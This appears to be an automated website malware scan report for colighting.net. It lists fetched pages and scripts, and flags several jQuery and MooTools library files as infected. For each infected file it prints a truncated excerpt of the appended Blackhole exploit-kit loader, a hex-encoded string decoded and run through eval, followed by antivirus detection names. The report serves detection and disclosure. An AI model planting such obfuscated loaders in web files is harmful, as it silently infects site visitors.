| Request | Server response | Status |
http://colighting.net/ | 200 OK
Content-Length: 19119
Content-Type: text/html | clean |
http://maps.googleapis.com/maps/api/js?sensor=false | 200 OK
Content-Length: 4353
Content-Type: text/javascript | clean |
http://colighting.net/Scripts/funciones.js | 200 OK
Content-Length: 9072
Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function nuevoAjax() { var xmlhttp=false; try { xmlhttp=new ActiveXObject("Msxml2.XMLHTTP"); } catch(e) { try { xmlhttp=new ActiveXObject("Microsoft.XMLHTTP"); } catch(E) { xmlhttp=false; } } if (!xmlhttp && typeof XMLHttpRequest!='undefined') { xmlhttp=new XMLHttpRequest(); } return xmlhttp; } function cambia(valor,cap,fun) { var capa=document.getElementB ... 3264 bytes are skipped ...738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z)); - AntiVir
- JS/Blacole.EB.46
- Avast
- JS:Decode-AZW [Trj]
- Ad-Aware
- JS:Trojan.Script.CFX
- Ikarus
- Trojan.JS.Agent
- nProtect
- JS:Trojan.Script.CFX
- TrendMicro-HouseCall
- JS_BLACOLE.SMTM
- Comodo
- Exploit.JS.Blacole.EZ
- Emsisoft
- JS:Trojan.Script.CFX (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_BLACOLE.SMTM
- Microsoft
- Exploit:JS/Blacole.OL
- Kaspersky
- Trojan.JS.Iframe.agi
- MicroWorld-eScan
- JS:Trojan.Script.CFX
- Fortinet
- JS/Kryptik.CFX!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.cdoahu
- F-Secure
- JS:Trojan.Script.CFX
- VIPRE
- Trojan.JS.IFrame.afk (v)
- AVG
- JS/Exploit
- GData
- JS:Trojan.Script.CFX
- Symantec
- Trojan.Malscript
- BitDefender
- JS:Trojan.Script.CFX
|
http://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js | 200 OK
Content-Length: 94840
Content-Type: text/javascript | clean |
http://colighting.net/CCSlider_files/jquery.easing.1.3.js | 200 OK
Content-Length: 9593
Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t + b; }, easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) + b; }, easeInOutQuad: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t + b; retur ... 3281 bytes are skipped ...738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z)); - AntiVir
- JS/Blacole.EB.46
- Avast
- JS:Decode-AZW [Trj]
- Ad-Aware
- JS:Trojan.Script.CFX
- Bkav
- MW.Clodca7.Trojan.5fd2
- Ikarus
- Trojan.JS.Agent
- nProtect
- JS:Trojan.Script.CFX
- TrendMicro-HouseCall
- JS_BLACOLE.SMTM
- Comodo
- Exploit.JS.Blacole.EZ
- Emsisoft
- JS:Trojan.Script.CFX (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_BLACOLE.SMTM
- Microsoft
- Exploit:JS/Blacole.OL
- Kaspersky
- Trojan.JS.Iframe.agi
- MicroWorld-eScan
- JS:Trojan.Script.CFX
- Fortinet
- JS/Kryptik.CFX!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.cdoahu
- F-Secure
- JS:Trojan.Script.CFX
- VIPRE
- Trojan.JS.IFrame.afk (v)
- AVG
- JS/Exploit
- Norman
- Blacole.VX
- GData
- JS:Trojan.Script.CFX
- Symantec
- Trojan.Malscript
- BitDefender
- JS:Trojan.Script.CFX
|
http://colighting.net/CCSlider_files/jquery.ccslider-2.0.1.min.js | 200 OK
Content-Length: 32318
Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(c,a){function b(E,ae){var aQ=c.extend(true,{},c.fn.ccslider.defaults,ae);var I=this,ax=c(E),X=ax.wrapInner('<div class="slider-innerWrapper"/>').find(".slider-innerWrapper"),aN=c('<div class="slider-controls"/>').appendTo(ax),aB=ax.width(),x=ax.height(),D=aB,aj=x,aq=ax.find("img"),aa=aq.length,L,n,Q=false,O=false,an=[],al=false,j=aQ._3dOptions.imageWidth,aM=aQ._3dOptions.imageHeight,aX=aQ._3dOptions.transparentImg,V=aQ._3dOptions.innerSideColor,l=aQ._3dOptions.makeShadow,W= ... 3077 bytes are skipped ...738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z)); - AntiVir
- JS/Blacole.EB.46
- Avast
- JS:Decode-AZW [Trj]
- Ad-Aware
- JS:Trojan.Script.CFX
- Ikarus
- Trojan.JS.Agent
- nProtect
- JS:Trojan.Script.CFX
- Emsisoft
- JS:Trojan.Script.CFX (B)
- Comodo
- Exploit.JS.Blacole.EZ
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OL
- MicroWorld-eScan
- JS:Trojan.Script.CFX
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.cdoahu
- F-Secure
- JS:Trojan.Script.CFX
- VIPRE
- Trojan.JS.IFrame.afk (v)
- AVG
- JS/Exploit
- Norman
- Blacole.VX
- GData
- JS:Trojan.Script.CFX
- Symantec
- Trojan.Malscript
- BitDefender
- JS:Trojan.Script.CFX
|
http://colighting.net/Scripts/jquery.slider.min.js | 200 OK
Content-Length: 6591
Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){$.fn.slider=function(options){var $this=this;var settings={'width':this.width(),'height':this.height(),'wait':4000,'fade':750,'direction':'left','showControls':true,'showProgress':true,'hoverPause':true,'autoplay':true,'randomize':false,'slidebefore':function(){},'slideafter':function(){},'rewind':function(){}};var _timer=false;var _last=false;var _this=false;var _cycle=function(){clearTimeout(_timer);_last=_this;if(settings.direction=='right'){_this=_this.prev('.jquery-slider-eleme ... 3031 bytes are skipped ...738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z)); - AntiVir
- JS/Blacole.EB.46
- Avast
- JS:Decode-AZW [Trj]
- Ad-Aware
- JS:Trojan.Script.CFX
- Ikarus
- Trojan.JS.Agent
- nProtect
- JS:Trojan.Script.CFX
- TrendMicro-HouseCall
- JS_BLACOLE.SMTM
- Emsisoft
- JS:Trojan.Script.CFX (B)
- Comodo
- Exploit.JS.Blacole.EZ
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- JS_BLACOLE.SMTM
- Microsoft
- Exploit:JS/Blacole.OL
- Kaspersky
- Trojan.JS.Iframe.agi
- MicroWorld-eScan
- JS:Trojan.Script.CFX
- Fortinet
- JS/Kryptik.CFX!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.cdoahu
- F-Secure
- JS:Trojan.Script.CFX
- VIPRE
- Trojan.JS.IFrame.afk (v)
- AVG
- JS/Exploit
- Norman
- Blacole.VX
- GData
- JS:Trojan.Script.CFX
- Symantec
- Trojan.Malscript
- BitDefender
- JS:Trojan.Script.CFX
|
http://colighting.net/Scripts/jquery.animate-colors.js | 200 OK
Content-Length: 6427
Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { function isRGBACapable() { var $script = $('script:first'), color = $script.css('color'), result = false; if (/^rgba/.test(color)) { result = true; } else { try { result = ( color != $script.css('color', 'rgba(0, 0, 0, 0.5)').css('color') ); $script.css('color', color); } catch (e) { } } return result; } $.extend(true, $, { support: { 'rgba': isRGBACapable()< ... 3241 bytes are skipped ...738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z)); - AntiVir
- JS/Blacole.EB.46
- Avast
- JS:Decode-AZW [Trj]
- Ad-Aware
- JS:Trojan.Script.CFX
- Ikarus
- Trojan.JS.Agent
- nProtect
- JS:Trojan.Script.CFX
- TrendMicro-HouseCall
- JS_BLACOLE.SMTM
- Emsisoft
- JS:Trojan.Script.CFX (B)
- Comodo
- Exploit.JS.Blacole.EZ
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- JS_BLACOLE.SMTM
- Microsoft
- Exploit:JS/Blacole.OL
- Kaspersky
- Trojan.JS.Iframe.agi
- MicroWorld-eScan
- JS:Trojan.Script.CFX
- Fortinet
- JS/Kryptik.CFX!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.cdoahu
- F-Secure
- JS:Trojan.Script.CFX
- VIPRE
- Trojan.JS.IFrame.afk (v)
- AVG
- JS/Exploit
- Norman
- Blacole.VX
- GData
- JS:Trojan.Script.CFX
- Symantec
- Trojan.Malscript
- BitDefender
- JS:Trojan.Script.CFX
|
http://colighting.net/Scripts/jquery.colorbox.js | 200 OK
Content-Length: 30060
Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function ($, document, window) { var defaults = { transition: "elastic", speed: 300, width: false, initialWidth: "600", innerWidth: false, maxWidth: false, height: false, initialHeight: "450", innerHeight: false, maxHeight: false, scalePhotos: true, scrolling: true, inline: false, html: false, ... 3334 bytes are skipped ...738283807c2e837c7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z)); - AntiVir
- JS/Blacole.EB.46
- Avast
- JS:Decode-AZW [Trj]
- Ad-Aware
- JS:Trojan.Script.CFX
- Ikarus
- Trojan.JS.IFrame
- nProtect
- JS:Trojan.Script.CFX
- Comodo
- Exploit.JS.Blacole.EZ
- Emsisoft
- JS:Trojan.Script.CFX (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OL
- Kaspersky
- Trojan.JS.Iframe.agi
- MicroWorld-eScan
- JS:Trojan.Script.CFX
- Fortinet
- JS/Kryptik.CFX!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.cdoahu
- F-Secure
- JS:Trojan.Script.CFX
- VIPRE
- Trojan.JS.IFrame.afk (v)
- AVG
- JS/Exploit
- Norman
- Blacole.VX
- GData
- JS:Trojan.Script.CFX
- Symantec
- Trojan.Malscript
- BitDefender
- JS:Trojan.Script.CFX
|
http://colighting.net/inicio | 200 OK
Content-Length: 19119
Content-Type: text/html | clean |
http://colighting.net/conozcanos | 200 OK
Content-Length: 21118
Content-Type: text/html | clean |
http://colighting.net/productos | 200 OK
Content-Length: 37907
Content-Type: text/html | clean |
http://colighting.net/Scripts/mootools-more.js | 200 OK
Content-Length: 100933
Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) MooTools.More={version:"1.3.0.1",build:"6dce99bed2792dffcbbbb4ddc15a1fb9a41994b5"};Events.Pseudos=function(f,c,d){var b="monitorEvents:";var a=function(g){return{store:g.store?function(h,i){g.store(b+h,i); }:function(h,i){(g.$monitorEvents||(g.$monitorEvents={}))[h]=i;},retrieve:g.retrieve?function(h,i){return g.retrieve(b+h,i);}:function(h,i){if(!g.$monitorEvents){return i; }return g.$monitorEvents[h]||i;}};};var e=function(h){if(h.indexOf(":")==-1){return null;}var g=Slick.parse(h).exp ... 3091 bytes are skipped ...7381716f7e73362e727d71837b737c823c717d7d7977733c818370818280777c75362e7a737c3a2e737c722e372e37491b188b1b1877742e367c6f8477756f827d803c717d7d797773537c6f707a7372371b18891b18777436557382517d7d7977733635847781778273726d837f35374b4b434337898b737a817389617382517d7d7977733635847781778273726d837f353a2e354343353a2e353f353a2e353d3537491b181b188888887474743637491b188b1b188b1b18";z=[];for(i=0;i<a.length;i+=2){z.push(parseInt(a.substr(i,2),16)-14);}eval(ss["fr"+"omCharCode"].apply(ss,z)); /*/d04bb5*/ - AntiVir
- JS/Blacole.EB.46
- Avast
- JS:Decode-AZW [Trj]
- Ad-Aware
- JS:Trojan.Script.CFX
- Ikarus
- Trojan.JS.Agent
- nProtect
- JS:Trojan.Script.CFX
- Emsisoft
- JS:Trojan.Script.CFX (B)
- Comodo
- Exploit.JS.Blacole.EZ
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OL
- Kaspersky
- Trojan.JS.Iframe.afk
- MicroWorld-eScan
- JS:Trojan.Script.CFX
- Fortinet
- JS/Kryptik.CFX!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.cdoahu
- F-Secure
- JS:Trojan.Script.CFX
- VIPRE
- Trojan.JS.IFrame.afk (v)
- AVG
- JS/Exploit
- GData
- JS:Trojan.Script.CFX
- Symantec
- Trojan.Malscript
- BitDefender
- JS:Trojan.Script.CFX
|
http://colighting.net/servicios | 200 OK
Content-Length: 22019
Content-Type: text/html | clean |
http://colighting.net/clientes | 200 OK
Content-Length: 24927
Content-Type: text/html | clean |
